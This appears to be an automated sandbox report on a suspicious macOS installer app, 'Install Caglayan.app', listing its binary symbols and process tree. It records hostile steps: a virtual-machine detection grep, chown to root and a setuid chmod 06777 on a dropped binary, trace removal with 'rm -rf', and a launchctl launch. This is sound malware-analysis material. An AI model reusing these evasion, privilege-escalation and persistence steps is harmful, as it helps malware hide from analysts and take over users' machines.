File path:	caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/Info.plist
File size:	1355
File type:	XML 1.0 document, ASCII text

Extracted File
File path:	caglayan-macos/Install Caglayan.app/Contents/_CodeSignature/CodeResources
File size:	10604
File type:	XML 1.0 document, UTF-8 Unicode text

Extracted File
File path:	caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer
File size:	228860
File type:	Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|PIE>

Static Mach Info

General Information for header 1
Endian:	<
Size:	64-bit
Architecture:	x86_64
Filetype:	execute
Nbr. of load commands:	23
Entry point:	0x1000016A4

segment_command_64 aggregated: 4

Name	Value
segname	__PAGEZERO
vmaddr	0x0
vmsize	0x100000000
fileoff	0x0
filesize	0x0
maxprot	0x0
initprot	0x0
nsects	0
flags	0x0

Name

Value

segname

__TEXT

vmaddr

0x100000000

vmsize

0x30000

fileoff

0x0

filesize

0x30000

maxprot

0x7

initprot

0x5

nsects

flags

0x0

Datas

sectname	segname	addr	size	offset	align	reloff	nreloc	flags
__text	__TEXT	0x1000016A4	0x29AFC	0x16A4	0x2	0x0	0	0x80000400
__stubs	__TEXT	0x10002B1A0	0x198	0x2B1A0	0x1	0x0	0	0x80000408
__stub_helper	__TEXT	0x10002B338	0x2B8	0x2B338	0x2	0x0	0	0x80000400
__cstring	__TEXT	0x10002B5F0	0x45E	0x2B5F0	0x4	0x0	0	0x2
__objc_methname	__TEXT	0x10002BA4E	0xFC0	0x2BA4E	0x0	0x0	0	0x2
__gcc_except_tab	__TEXT	0x10002CA10	0x1180	0x2CA10	0x2	0x0	0	0x0
__objc_classname	__TEXT	0x10002DB90	0x96	0x2DB90	0x0	0x0	0	0x2
__objc_methtype	__TEXT	0x10002DC26	0x348	0x2DC26	0x0	0x0	0	0x2
__const	__TEXT	0x10002DF70	0xC0	0x2DF70	0x4	0x0	0	0x0
__unwind_info	__TEXT	0x10002E030	0x328	0x2E030	0x0	0x0	0	0x0
__eh_frame	__TEXT	0x10002E358	0x1CA0	0x2E358	0x3	0x0	0	0x0

Name

Value

segname

__DATA

vmaddr

0x100030000

vmsize

0x3000

fileoff

0x30000

filesize

0x3000

maxprot

0x7

initprot

0x3

nsects

flags

0x0

Datas

sectname	segname	addr	size	offset	align	reloff	nreloc	flags
__program_vars	__DATA	0x100030000	0x28	0x30000	0x3	0x0	0	0x0
__nl_symbol_ptr	__DATA	0x100030028	0x10	0x30028	0x3	0x0	0	0x6
__got	__DATA	0x100030038	0x68	0x30038	0x3	0x0	0	0x6
__la_symbol_ptr	__DATA	0x1000300A0	0x220	0x300A0	0x3	0x0	0	0x7
__const	__DATA	0x1000302C0	0x20	0x302C0	0x3	0x0	0	0x0
__objc_classlist	__DATA	0x1000302E0	0x20	0x302E0	0x3	0x0	0	0x10000000
__objc_nlclslist	__DATA	0x100030300	0x8	0x30300	0x3	0x0	0	0x10000000
__objc_catlist	__DATA	0x100030308	0x0	0x30308	0x0	0x0	0	0x10000000
__objc_protolist	__DATA	0x100030308	0x20	0x30308	0x3	0x0	0	0x0
__objc_imageinfo	__DATA	0x100030328	0x8	0x30328	0x2	0x0	0	0x0
__objc_const	__DATA	0x100030330	0x1140	0x30330	0x3	0x0	0	0x0
__objc_selrefs	__DATA	0x100031470	0x420	0x31470	0x3	0x0	0	0x10000005
__objc_msgrefs	__DATA	0x100031890	0x80	0x31890	0x4	0x0	0	0x0
__objc_protorefs	__DATA	0x100031910	0x10	0x31910	0x3	0x0	0	0x0
__objc_classrefs	__DATA	0x100031920	0xA0	0x31920	0x3	0x0	0	0x10000000
__objc_superrefs	__DATA	0x1000319C0	0x8	0x319C0	0x3	0x0	0	0x10000000
__objc_data	__DATA	0x1000319C8	0x190	0x319C8	0x3	0x0	0	0x0
__cfstring	__DATA	0x100031B58	0x560	0x31B58	0x3	0x0	0	0x0
__data	__DATA	0x1000320C0	0x278	0x320C0	0x4	0x0	0	0x0
__objc_ivar	__DATA	0x100032338	0x20	0x32338	0x3	0x0	0	0x0
__common	__DATA	0x100032358	0x28	0x0	0x3	0x0	0	0x1
__bss	__DATA	0x100032380	0x4	0x0	0x2	0x0	0	0x1

Name	Value
segname	__LINKEDIT
vmaddr	0x100033000
vmsize	0x5000
fileoff	0x33000
filesize	0x4DFC
maxprot	0x7
initprot	0x1
nsects	0
flags	0x0

dyld_info_command aggregated: 1

Name	Value
rebase_off	208896
rebase_size	256
bind_off	209152
bind_size	1184
weak_bind_off	0
weak_bind_size	0
lazy_bind_off	210336
lazy_bind_size	1520
export_off	211856
export_size	208

symtab_command aggregated: 1

Name	Value
symoff	212312
nsyms	454
stroff	220180
strsize	8680

dysymtab_command aggregated: 1

Name	Value
ilocalsym	0
nlocalsym	339
iextdefsym	339
nextdefsym	11
iundefsym	350
nundefsym	104
tocoff	0
ntoc	0
modtaboff	0
nmodtab	0
extrefsymoff	0
nextrefsyms	0
indirectsymoff	219576
nindirectsyms	151
extreloff	0
nextrel	0
locreloff	0
nlocrel	0

dylinker_command aggregated: 1

Name

Value

name

Datas

/usr/lib/dyld

uuid_command aggregated: 1

Name	Value
uuid	b'\x9d\xaf\x8b\x93\xca\xff0\x83\x88\xbddBkB+\x0c'

version_min_command aggregated: 1

Name	Value
version	657152
sdk	657664

thread_command aggregated: 1

Name	Value
flavor	4
count	42

dylib_command aggregated: 10

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

55471.0.0

compatibility_version

1.0.0

Datas

/System/Library/Frameworks/Security.framework/Versions/A/Security

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

20.0.0

compatibility_version

1.0.0

Datas

/System/Library/Frameworks/Cocoa.framework/Versions/A/Cocoa

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

50.0.0

compatibility_version

0.9.8

Datas

/usr/lib/libcrypto.0.9.8.dylib

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

1.2.5

compatibility_version

1.0.0

Datas

/usr/lib/libz.1.dylib

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

1056.0.0

compatibility_version

300.0.0

Datas

/System/Library/Frameworks/Foundation.framework/Versions/C/Foundation

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

228.0.0

compatibility_version

1.0.0

Datas

/usr/lib/libobjc.A.dylib

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

60.0.0

compatibility_version

7.0.0

Datas

/usr/lib/libstdc++.6.dylib

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

1197.1.1

compatibility_version

1.0.0

Datas

/usr/lib/libSystem.B.dylib

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

1265.0.0

compatibility_version

45.0.0

Datas

/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit

Name

Value

name

timestamp

Thu Jan 1 01:00:02 1970

current_version

855.11.0

compatibility_version

150.0.0

Datas

/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation

linkedit_data_command aggregated: 2

Name	Value
dataoff	212064
datasize	248

Name	Value
dataoff	212312
datasize	0

Internal Symbols

+[GIFileOps baseAttributes]

+[GIFileOps copy:to:]

+[GIFileOps createDirectory:shouldDelete:]

+[GIFileOps loadAgent:]

+[GIFileOps move:to:]

+[GIFileOps remove:]

+[GIFileOps rename:to:]

+[GIFileOps setDataFileAttributes:]

+[GIFileOps setDirectoryAttributes:]

+[GIFileOps setExecutableFileAttributes:]

+[GIFileOps setFile:withAttributes:]

+[GIFileOps setStandardAttributes:]

+[GIFileOps setSuid:]

+[GIFileOps unloadAgent:]

+[GIFileOps unloadKext]

+[GIFileOps(Zip) unzip:to:]

+[GIPath agentName]

+[GIPath agentSource]

+[GIPath agentTarget]

+[GIPath compressedPayload]

+[GIPath coreName]

+[GIPath coreSource]

+[GIPath coreTarget]

+[GIPath executables]

+[GIPath expandedMainBundle]

+[GIPath expandedPayload]

+[GIPath installationMap]

+[GIPath installer]

+[GIPath kextName]

+[GIPath kextSource]

+[GIPath kextTarget]

+[GIPath masterKeyDirSource]

+[GIPath masterKeyDirTarget]

+[GIPath payload]

+[GIPath supervisorName]

+[GIPath supervisorSource]

+[GIPath supervisorTarget]

+[GIPath systemTemp]

+[GIPath trampoline]

+[GIPath updatePackage]

-[ZipArchive CloseZipFile2]

-[ZipArchive CreateZipFile2:Password:]

-[ZipArchive CreateZipFile2:]

-[ZipArchive Date1980]

-[ZipArchive OutputErrorMessage:]

-[ZipArchive OverWrite:]

-[ZipArchive UnzipCloseFile]

-[ZipArchive UnzipFileTo:overWrite:]

-[ZipArchive UnzipOpenFile:Password:]

-[ZipArchive UnzipOpenFile:]

-[ZipArchive addFileToZip:newname:]

-[ZipArchive dealloc]

-[ZipArchive delegate]

-[ZipArchive init]

-[ZipArchive setDelegate:]

-[appAppDelegate applicationDidFinishLaunching:]

-[appAppDelegate askUserPermission:]

-[appAppDelegate askUserPermission:].myItems

-[appAppDelegate askUserPermission:].myToolPath

-[appAppDelegate askUserPermission:].myToolPath2

-[appAppDelegate executeTrampoline]

-[appAppDelegate expandPayload]

-[appAppDelegate installPayload]

-[appAppDelegate isAfterPatch]

-[appAppDelegate launchNewStyle]

-[appAppDelegate launchOldStyle]

-[appAppDelegate removeOldResource]

-[appAppDelegate removeTraces]

/SourceCache/arclite/arclite-34/source/

/Users/dev/DevStuff/obfuscator/build/lib/arc/libarclite_macosx.a(arclite.o)

GCC_except_table0

GCC_except_table1

GCC_except_table10

GCC_except_table11

GCC_except_table12

GCC_except_table13

GCC_except_table14

GCC_except_table15

GCC_except_table17

GCC_except_table18

GCC_except_table2

GCC_except_table20

GCC_except_table21

GCC_except_table22

GCC_except_table23

GCC_except_table3

GCC_except_table4

GCC_except_table5

GCC_except_table6

GCC_except_table7

GCC_except_table8

GCC_except_table9

_AuthorizationCopyRights

_AuthorizationCreate

_AuthorizationExecuteWithPrivileges

_AuthorizationFree

_NSApplicationMain

_NSFileGroupOwnerAccountID

_NSFileModificationDate

_NSFileOwnerAccountID

_NSFilePosixPermissions

_NSGregorianCalendar

_NSSearchPathForDirectoriesInDomains

_NXArgc

_NXArgv

_OBJC_$_CLASS_METHODS___ARCLite__

_OBJC_CLASS_$_GIFileOps

_OBJC_CLASS_$_GIPath

_OBJC_CLASS_$_NSArray

_OBJC_CLASS_$_NSAutoreleasePool

_OBJC_CLASS_$_NSBundle

_OBJC_CLASS_$_NSCalendar

_OBJC_CLASS_$_NSCharacterSet

_OBJC_CLASS_$_NSData

_OBJC_CLASS_$_NSDateComponents

_OBJC_CLASS_$_NSDictionary

_OBJC_CLASS_$_NSFileManager

_OBJC_CLASS_$_NSMutableArray

_OBJC_CLASS_$_NSMutableDictionary

_OBJC_CLASS_$_NSMutableOrderedSet

_OBJC_CLASS_$_NSNumber

_OBJC_CLASS_$_NSObject

_OBJC_CLASS_$_NSOrderedSet

_OBJC_CLASS_$_NSPipe

_OBJC_CLASS_$_NSString

_OBJC_CLASS_$_NSTask

_OBJC_CLASS_$_ZipArchive

_OBJC_CLASS_$___ARCLite__

_OBJC_CLASS_$_appAppDelegate

_OBJC_CLASS_RO_$___ARCLite__

_OBJC_EHTYPE_$_NSException

_OBJC_IVAR_$_ZipArchive._delegate

_OBJC_IVAR_$_ZipArchive._password

_OBJC_IVAR_$_ZipArchive._unzFile

_OBJC_IVAR_$_ZipArchive._zipFile

_OBJC_METACLASS_$_GIFileOps

_OBJC_METACLASS_$_GIPath

_OBJC_METACLASS_$_NSObject

_OBJC_METACLASS_$_ZipArchive

_OBJC_METACLASS_$___ARCLite__

_OBJC_METACLASS_$_appAppDelegate

_OBJC_METACLASS_RO_$___ARCLite__

__Block_copy

__Unwind_Resume

___ARCLite__load

___CFConstantStringClassReference

___arclite_NSArray_objectAtIndexedSubscript

___arclite_NSDictionary_objectForKeyedSubscript

___arclite_NSMutableArray_setObject_atIndexedSubscript

___arclite_NSMutableDictionary__setObject_forKeyedSubscript

___arclite_NSMutableOrderedSet_setObject_atIndexedSubscript

___arclite_NSOrderedSet_objectAtIndexedSubscript

___arclite_objc_autorelease

___arclite_objc_autoreleasePoolPop

___arclite_objc_autoreleasePoolPush

___arclite_objc_autoreleaseReturnValue

___arclite_objc_release

___arclite_objc_retain

___arclite_objc_retainAutorelease

___arclite_objc_retainAutoreleaseReturnValue

___arclite_objc_retainAutoreleasedReturnValue

___arclite_objc_retainBlock

___arclite_objc_storeStrong

___arclite_object_copy

___arclite_object_setInstanceVariable

___arclite_object_setIvar

___bzero

___gxx_personality_v0

___objc_personality_v0

___progname

___stack_chk_fail

___stack_chk_guard

__class_name

__dyld_register_func_for_add_image

__load_method_name

__load_method_type

__mh_execute_header

__non_lazy_classes

__objc_empty_cache

__objc_empty_vtable

_add_data_in_datablock

_add_image_hook_ARC

_add_image_hook_ARC.names

_add_image_hook_ARC.pointers

_add_image_hook_GC

_add_image_hook_GC.names

_add_image_hook_GC.pointers

_allocate_new_datablock

_calloc

_class_addMethod

_class_getInstanceMethod

_class_getInstanceSize

_class_getInstanceVariable

_class_getIvarLayout

_class_getSuperclass

_crc32

_crypthead.calls

_deflate

_deflateEnd

_deflateInit2_

_deny_ptrace

_dlclose

_dlopen

_dlsym

_environ

_exit

_fclose

_fclose_file_func

_ferror

_ferror_file_func

_fill_fopen_filefunc

_fopen

_fopen_file_func

_fread

_fread_file_func

_free

_fseek

_fseek_file_func

_ftell

_ftell_file_func

_fwrite

_fwrite_file_func

_get_crc_table

_getpid

_inflate

_inflateEnd

_inflateInit2_

_init_keys

_ivar_getName

_ivar_getOffset

_main

_malloc

_memcpy

_memmove

_objc_assign_strongCast

_objc_autoreleasePoolPop

_objc_autoreleasePoolPush

_objc_autoreleaseReturnValue

_objc_begin_catch

_objc_collectingEnabled

_objc_end_catch

_objc_msgSend

_objc_msgSendSuper2

_objc_msgSend_fixup

_objc_release

_objc_retain

_objc_retainAutorelease

_objc_retainAutoreleasedReturnValue

_objc_retainedObject

_objc_setProperty

_objc_unretainedObject

_objc_unretainedPointer

_object_getClass

_object_setIvar

_patch_lazy_pointers

_protocol_getMethodDescription

_pvars

_rand

_remove

_sleep

_srand

_statvfs

_strcmp

_strcmpcasenosensitive_internal

_strlen

_sysctl

_sysctlbyname

_time

_unzClose

_unzCloseCurrentFile

_unzGetCurrentFileInfo

_unzGetFilePos

_unzGetGlobalComment

_unzGetGlobalInfo

_unzGetLocalExtrafield

_unzGetOffset

_unzGoToFilePos

_unzGoToFirstFile

_unzGoToNextFile

_unzLocateFile

_unzOpen

_unzOpen2

_unzOpenCurrentFile

_unzOpenCurrentFile2

_unzOpenCurrentFile3

_unzOpenCurrentFilePassword

_unzReadCurrentFile

_unzRepair

_unzSetOffset

_unzStringFileNameCompare

_unz_copyright

_unzeof

_unzlocal_CheckCurrentFileCoherencyHeader

_unzlocal_GetCurrentFileInfoInternal

_unzlocal_getByte

_unzlocal_getLong

_unzlocal_getShort

_unztell

_zipClose

_zipCloseFileInZip

_zipCloseFileInZipRaw

_zipFlushWriteBuffer

_zipOpen

_zipOpen2

_zipOpenNewFileInZip

_zipOpenNewFileInZip2

_zipOpenNewFileInZip3

_zipWriteInFileInZip

_zip_copyright

_ziplocal_TmzDateToDosDate

_ziplocal_getByte

_ziplocal_getLong

_ziplocal_getShort

_ziplocal_putValue

_ziplocal_putValue_inmemory

arclite.m

dyld_stub_binder

start

External symbols

_AuthorizationCopyRights

_AuthorizationCreate

_AuthorizationExecuteWithPrivileges

_AuthorizationFree

_NSApplicationMain

_NSSearchPathForDirectoriesInDomains

__Block_copy

__Unwind_Resume

___bzero

___stack_chk_fail

__dyld_register_func_for_add_image

_calloc

_class_addMethod

_class_getInstanceMethod

_class_getInstanceSize

_class_getInstanceVariable

_class_getIvarLayout

_class_getSuperclass

_crc32

_deflate

_deflateEnd

_deflateInit2_

_dlclose

_dlopen

_dlsym

_exit

_fclose

_ferror

_fopen

_fread

_free

_fseek

_ftell

_fwrite

_get_crc_table

_getpid

_inflate

_inflateEnd

_inflateInit2_

_ivar_getName

_ivar_getOffset

_malloc

_memcpy

_memmove

_objc_assign_strongCast

_objc_autoreleasePoolPop

_objc_autoreleasePoolPush

_objc_autoreleaseReturnValue

_objc_begin_catch

_objc_collectingEnabled

_objc_end_catch

_objc_msgSendSuper2

_objc_retainAutorelease

_objc_retainAutoreleasedReturnValue

_objc_setProperty

_object_getClass

_object_setIvar

_protocol_getMethodDescription

_rand

_remove

_sleep

_srand

_statvfs

_strcmp

_strlen

_sysctl

_sysctlbyname

_time

Extracted File
File path:	caglayan-macos/Install Caglayan.app/Contents/MacOS/Install Caglayan
File size:	193
File type:	Bourne-Again shell script, UTF-8 Unicode text executable

Extracted File
File path:	caglayan-macos/Install Caglayan.app/Contents/Info.plist
File size:	1672
File type:	XML 1.0 document, UTF-8 Unicode text

Network Behavior

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2020 15:32:01.242830038 CEST	55183	53	192.168.0.51	8.8.8.8
Sep 28, 2020 15:32:01.256620884 CEST	53	55183	8.8.8.8	192.168.0.51
Sep 28, 2020 15:32:01.688330889 CEST	50773	53	192.168.0.51	8.8.8.8
Sep 28, 2020 15:32:01.702177048 CEST	53	50773	8.8.8.8	192.168.0.51
Sep 28, 2020 15:32:03.040055037 CEST	60019	53	192.168.0.51	8.8.8.8
Sep 28, 2020 15:32:03.053606987 CEST	53	60019	8.8.8.8	192.168.0.51
Sep 28, 2020 15:32:33.634593964 CEST	62510	53	192.168.0.51	8.8.8.8
Sep 28, 2020 15:32:33.647979975 CEST	53	62510	8.8.8.8	192.168.0.51
Sep 28, 2020 15:32:33.744075060 CEST	63310	53	192.168.0.51	8.8.8.8
Sep 28, 2020 15:32:33.759704113 CEST	53	63310	8.8.8.8	192.168.0.51

System Behavior

Analysis Process: xpcproxy PID: 772 Parent PID: 1

General

Start time:	15:31:57
Start date:	28/09/2020
Path:	/usr/libexec/xpcproxy
Arguments:	n/a
File size:	44048 bytes
MD5 hash:	4782e7ebd2985d32bc84f1f71c8f8fb7

Chronological Activities

Analysis Process: Install Caglayan PID: 772 Parent PID: 1

General

Start time:	15:31:57
Start date:	28/09/2020
Path:	/Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/Install Caglayan
Arguments:	/Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/Install Caglayan
File size:	193 bytes
MD5 hash:	083628f5eaf3d1d5018d45dd10391d9f

Chronological Activities

Analysis Process: bash PID: 773 Parent PID: 772

General

Start time:	15:31:57
Start date:	28/09/2020
Path:	/bin/bash
Arguments:	n/a
File size:	618416 bytes
MD5 hash:	0313fd399b143fc40cd52a1679018305

Chronological Activities

Analysis Process: bash PID: 774 Parent PID: 773

General

Start time:	15:31:57
Start date:	28/09/2020
Path:	/bin/bash
Arguments:	n/a
File size:	618416 bytes
MD5 hash:	0313fd399b143fc40cd52a1679018305

Chronological Activities

Analysis Process: bash PID: 775 Parent PID: 774

General

Start time:	15:31:57
Start date:	28/09/2020
Path:	/bin/bash
Arguments:	n/a
File size:	618416 bytes
MD5 hash:	0313fd399b143fc40cd52a1679018305

Chronological Activities

Analysis Process: dirname PID: 775 Parent PID: 774

General

Start time:	15:31:57
Start date:	28/09/2020
Path:	/usr/bin/dirname
Arguments:	dirname /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/Install Caglayan
File size:	18128 bytes
MD5 hash:	6c2a99249cf9eefc79be8dc17bcc5758

Chronological Activities

Analysis Process: bash PID: 776 Parent PID: 772

General

Start time:	15:31:57
Start date:	28/09/2020
Path:	/bin/bash
Arguments:	n/a
File size:	618416 bytes
MD5 hash:	0313fd399b143fc40cd52a1679018305

Chronological Activities

Analysis Process: open PID: 776 Parent PID: 772

General

Start time:	15:31:57
Start date:	28/09/2020
Path:	/usr/bin/open
Arguments:	open .log/ARA0848.app
File size:	105952 bytes
MD5 hash:	429e364174ecacaa7bd753b1d15a998e

Chronological Activities

Analysis Process: bash PID: 782 Parent PID: 772

General

Start time:	15:31:58
Start date:	28/09/2020
Path:	/bin/bash
Arguments:	n/a
File size:	618416 bytes
MD5 hash:	0313fd399b143fc40cd52a1679018305

Chronological Activities

Analysis Process: sleep PID: 782 Parent PID: 772

General

Start time:	15:31:58
Start date:	28/09/2020
Path:	/bin/sleep
Arguments:	sleep 2
File size:	18080 bytes
MD5 hash:	819cf284f59840e52b6b17f4ed2512e8

Chronological Activities

Analysis Process: bash PID: 786 Parent PID: 772

General

Start time:	15:32:00
Start date:	28/09/2020
Path:	/bin/bash
Arguments:	n/a
File size:	618416 bytes
MD5 hash:	0313fd399b143fc40cd52a1679018305

Chronological Activities

Analysis Process: rm PID: 786 Parent PID: 772

General

Start time:	15:32:00
Start date:	28/09/2020
Path:	/bin/rm
Arguments:	rm Install alayan
File size:	23968 bytes
MD5 hash:	269d0bd0553e7eafb6e3f70026eeda2b

Chronological Activities

Analysis Process: bash PID: 787 Parent PID: 772

General

Start time:	15:32:00
Start date:	28/09/2020
Path:	/bin/bash
Arguments:	n/a
File size:	618416 bytes
MD5 hash:	0313fd399b143fc40cd52a1679018305

Chronological Activities

Analysis Process: mv PID: 787 Parent PID: 772

General

Start time:	15:32:00
Start date:	28/09/2020
Path:	/bin/mv
Arguments:	mv installer Install alayan
File size:	24240 bytes
MD5 hash:	71b4f7c9a383f7c62c738273039ba658

Chronological Activities

Analysis Process: bash PID: 788 Parent PID: 772

General

Start time:	15:32:00
Start date:	28/09/2020
Path:	/bin/bash
Arguments:	n/a
File size:	618416 bytes
MD5 hash:	0313fd399b143fc40cd52a1679018305

Chronological Activities

Analysis Process: rm PID: 788 Parent PID: 772

General

Start time:	15:32:00
Start date:	28/09/2020
Path:	/bin/rm
Arguments:	rm -rf .log
File size:	23968 bytes
MD5 hash:	269d0bd0553e7eafb6e3f70026eeda2b

Chronological Activities

Analysis Process: bash PID: 789 Parent PID: 772

General

Start time:	15:32:00
Start date:	28/09/2020
Path:	/bin/bash
Arguments:	n/a
File size:	618416 bytes
MD5 hash:	0313fd399b143fc40cd52a1679018305

Chronological Activities

Analysis Process: Install alayan PID: 789 Parent PID: 772

General

Start time:	15:32:00
Start date:	28/09/2020
Path:	/Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/./Install alayan
Arguments:	./Install alayan
File size:	174384 bytes
MD5 hash:	177b332846b488a28d2468f0fed6309d

Chronological Activities

Analysis Process: installer PID: 794 Parent PID: 789

General

Start time:	15:32:02
Start date:	28/09/2020
Path:	/var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/installer
Arguments:	n/a
File size:	20823972 bytes
MD5 hash:	d420588e1c469c13850ed3c4656835dd

Chronological Activities

Analysis Process: hdiutil PID: 795 Parent PID: 794

General

Start time:	15:32:03
Start date:	28/09/2020
Path:	/usr/bin/hdiutil
Arguments:	n/a
File size:	349536 bytes
MD5 hash:	6a08ca12fec7ff0315356432b8cfe31b

Chronological Activities

Analysis Process: diskimages-helper PID: 796 Parent PID: 795

General

Start time:	15:32:03
Start date:	28/09/2020
Path:	/System/Library/PrivateFrameworks/DiskImages.framework/Resources/diskimages-helper
Arguments:	n/a
File size:	453856 bytes
MD5 hash:	ebbc1ca970cbe0467945c0b9de78fff4

Chronological Activities

Analysis Process: diskimages-helper PID: 797 Parent PID: 796

General

Start time:	15:32:03
Start date:	28/09/2020
Path:	/System/Library/PrivateFrameworks/DiskImages.framework/Resources/diskimages-helper
Arguments:	n/a
File size:	453856 bytes
MD5 hash:	ebbc1ca970cbe0467945c0b9de78fff4

Chronological Activities

Analysis Process: Adobe AIR Installer PID: 816 Parent PID: 794

General

Start time:	15:32:07
Start date:	28/09/2020
Path:	/var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/airfbGVbH/mountPoint/Adobe AIR Installer.app/Contents/MacOS/Adobe AIR Installer
Arguments:	n/a
File size:	43264 bytes
MD5 hash:	dd190ef23d03f215ff1b382f997c1c4d

Chronological Activities

Analysis Process: Adobe AIR Application Installer PID: 817 Parent PID: 816

General

Start time:	15:32:08
Start date:	28/09/2020
Path:	/var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/airfbGVbH/mountPoint/Adobe AIR Installer.app/Contents/Frameworks/Adobe AIR.framework/Versions/1.0/Adobe AIR Application Installer.app/Contents/MacOS/Adobe AIR Application Installer
Arguments:	n/a
File size:	41360 bytes
MD5 hash:	63794193434d8e02afdfa8c5e956b2dc

Chronological Activities

Analysis Process: xpcproxy PID: 777 Parent PID: 1

General

Start time:	15:31:57
Start date:	28/09/2020
Path:	/usr/libexec/xpcproxy
Arguments:	n/a
File size:	44048 bytes
MD5 hash:	4782e7ebd2985d32bc84f1f71c8f8fb7

Chronological Activities

Analysis Process: installer PID: 777 Parent PID: 1

General

Start time:	15:31:57
Start date:	28/09/2020
Path:	/Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer
Arguments:	/Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer
File size:	228860 bytes
MD5 hash:	405bb24ade435693b11af1d81e2bb279

Chronological Activities

Analysis Process: sh PID: 778 Parent PID: 777

General

Start time:	15:31:57
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: sh PID: 779 Parent PID: 778

General

Start time:	15:31:57
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: system_profiler PID: 779 Parent PID: 778

General

Start time:	15:31:57
Start date:	28/09/2020
Path:	/usr/sbin/system_profiler
Arguments:	system_profiler SPUSBDataType
File size:	45536 bytes
MD5 hash:	de1aa7b1e123ef5ba1b076a085bbcece

Chronological Activities

Analysis Process: system_profiler PID: 781 Parent PID: 779

General

Start time:	15:31:58
Start date:	28/09/2020
Path:	/usr/sbin/system_profiler
Arguments:	n/a
File size:	45536 bytes
MD5 hash:	de1aa7b1e123ef5ba1b076a085bbcece

Chronological Activities

Analysis Process: sh PID: 780 Parent PID: 778

General

Start time:	15:31:57
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: egrep PID: 780 Parent PID: 778

General

Start time:	15:31:57
Start date:	28/09/2020
Path:	/usr/bin/egrep
Arguments:	egrep -i Manufacturer: (parallels\|vmware\|virtualbox)
File size:	33952 bytes
MD5 hash:	e1a87983928499c3350fe1775def5d49

Chronological Activities

Analysis Process: helper PID: 783 Parent PID: 777

General

Start time:	15:31:59
Start date:	28/09/2020
Path:	/Users/ben/Library/Caches/org.logind.ctp.archive/helper
Arguments:	n/a
File size:	34292 bytes
MD5 hash:	afb46530d6693a3086302d8069292540

Chronological Activities

Analysis Process: helper PID: 792 Parent PID: 783

General

Start time:	15:32:01
Start date:	28/09/2020
Path:	/Users/ben/Library/Caches/org.logind.ctp.archive/helper
Arguments:	n/a
File size:	34292 bytes
MD5 hash:	afb46530d6693a3086302d8069292540

Chronological Activities

Analysis Process: security_authtrampoline PID: 792 Parent PID: 783

General

Start time:	15:32:01
Start date:	28/09/2020
Path:	/usr/libexec/security_authtrampoline
Arguments:	/usr/libexec/security_authtrampoline /usr/sbin/chown auth 3 root:wheel /Users/ben/Library/Caches/org.logind.ctp.archive/installer
File size:	19120 bytes
MD5 hash:	f55206da7dd9b6699ecb7e3e8ce994f7

Chronological Activities

Analysis Process: chown PID: 792 Parent PID: 783

General

Start time:	15:32:02
Start date:	28/09/2020
Path:	/usr/sbin/chown
Arguments:	/usr/sbin/chown root:wheel /Users/ben/Library/Caches/org.logind.ctp.archive/installer
File size:	23312 bytes
MD5 hash:	4412bd1c28443ef4cc603af3ad92ddc0

Chronological Activities

Analysis Process: helper PID: 793 Parent PID: 783

General

Start time:	15:32:02
Start date:	28/09/2020
Path:	/Users/ben/Library/Caches/org.logind.ctp.archive/helper
Arguments:	n/a
File size:	34292 bytes
MD5 hash:	afb46530d6693a3086302d8069292540

Chronological Activities

Analysis Process: security_authtrampoline PID: 793 Parent PID: 783

General

Start time:	15:32:02
Start date:	28/09/2020
Path:	/usr/libexec/security_authtrampoline
Arguments:	/usr/libexec/security_authtrampoline /bin/chmod auth 3 06777 /Users/ben/Library/Caches/org.logind.ctp.archive/installer
File size:	19120 bytes
MD5 hash:	f55206da7dd9b6699ecb7e3e8ce994f7

Chronological Activities

Analysis Process: chmod PID: 793 Parent PID: 783

General

Start time:	15:32:02
Start date:	28/09/2020
Path:	/bin/chmod
Arguments:	/bin/chmod 06777 /Users/ben/Library/Caches/org.logind.ctp.archive/installer
File size:	30016 bytes
MD5 hash:	d7df83ea3a49de5d07e0c1730e910852

Chronological Activities

Analysis Process: installer PID: 798 Parent PID: 777

General

Start time:	15:32:04
Start date:	28/09/2020
Path:	/Users/ben/Library/Caches/org.logind.ctp.archive/installer
Arguments:	n/a
File size:	63396 bytes
MD5 hash:	6e427b21b601165386ca36d852e49c02

Chronological Activities

Analysis Process: launchctl PID: 800 Parent PID: 798

General

Start time:	15:32:04
Start date:	28/09/2020
Path:	/bin/launchctl
Arguments:	n/a
File size:	121296 bytes
MD5 hash:	3e04cf4fe184467aa2dbf4e4d5c72f3d

Chronological Activities

Analysis Process: xpcproxy PID: 801 Parent PID: 1

General

Start time:	15:32:04
Start date:	28/09/2020
